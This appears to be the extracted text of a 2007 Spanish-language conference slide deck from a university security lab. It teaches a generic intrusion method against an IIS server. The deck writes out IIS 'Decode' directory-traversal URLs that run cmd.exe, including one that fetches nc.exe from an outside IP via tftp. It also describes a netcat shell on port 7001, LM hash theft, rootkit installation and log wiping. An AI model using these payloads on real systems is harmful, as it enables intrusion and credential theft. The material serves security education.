Upload
maritza-soliz
View
23
Download
5
Embed Size (px)
Citation preview
La Praxis del Cracker
Miguel Torrealba S.([email protected])
Universidad Simón Bolívar
Venezuela
LACNIC X - Marzo 2007 - Margarita
Laboratorio de Seguridad en Tecnología de la Información
USBGISTI
“La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas”.
Simson Garfinkel y Eugene Spafford (1999)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Footprinting
(Hallar el Rastro)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Scanning
(Exploración)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve
- La salida ya provee un indicio del “servidor web” que se está ejecutando y del puerto que está atendiendo las peticiones
- Empleando otras herramientas como “nmap” de Fyodor, que identifican el sistema operativo usando “TCP Stack Fingerprinting” se puede obtener una información más confiable
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Enumeration
(Enumeración)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Gainning Access
(Ganar Acceso)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\
- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima.
- Para lograr eso solo requiere ejecutar el comando “dir” de la consola de comandos a través del servidor web
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\- ..%255c.. = ..(%25)5c.. = ..%5c .. = ..(%5c).. = .. \ ..http://jeremias.nul.usb.ve/scripts/..\../..\../winnt/system32/cmd.exe?c+dir+c:\
- Estructura lógica del disco de Jeremias:
C: \ Inetpub \ scripts \
Winnt \ system32 \
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+c:\winnt/system32/tftp.exe+-i+159.90.31.161+get+nc.exe
- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima.
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\Inetpub\scripts
- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa.
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Hora de transferir un “exploit”- “Httpodbc.dll” es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad “Decode” del IIS 4.0 y 5.0
- Para el “servidor web” del sistema de la víctima este programa parecerá un “código script” que ha sido colocado para que los usuarios finales lo ejecuten
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del “servidor web” IIS 4.0 o 5.0
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Escalating Privilege
(Escalar Privilegios)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Con esta orden se procede a ejecutar “NETCAT” la “navaja del ejército suizo” de “Hackers” de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima
• Un “nuevo” servicio de comandos queda escuchando desde ese instante
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Desde una consola de comandos local –el atacante- ejecuta ahora un “telnet” al puerto 7001 del sistema de la víctima
• La idea es disponer de un “login remoto” que permita ejecutar comandos en el sistema víctima
• Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un “terminal virtual en la red”
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Con el Telnet se ha establecido una conexión TCP a la consola de comandos que “escucha” peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica
• Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio “transparente”
• Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Pilfering
(Ratería, Vileza, Bajeza, Ruindad)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo “Crackeador”
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Creating Backdoors
(Crear las Puertas Traseras)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Ahora el Cracker puede “sembrar” calquier programa tipo “backdoor” que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad “Decode” del IIS 4.0 y 5.0 es subsanada
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Rootkit HD 1.0 – versión de evaluación -
- Opera en sistemas WNT/W2K/WXP
- Parecido a un “troyano”, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta
- Genera un nuevo servicio “Hacker Defender 100” sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente “bdclient”
- Puede adaptar su funcionamiento para disponer de distintas formas de operación
- Provee facilidad de contraseña para controlar su ejecución
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
Covering Tracks
(Cubrir las Huellas)
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Finalmente, si se han transferido programas para alterar los “logs”, el Cracker puede borrar fácilmente toda “huella” de su actividad. En caso contrario puede hacerlo manualmente
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE
• Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo
La Praxis del Cracker – MTS – Margarita 2007
_________________________________CIERRE
“Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro”.
Sun Tzu
El Arte de la Guerra
La Praxis del Cracker – MTS – Margarita 2007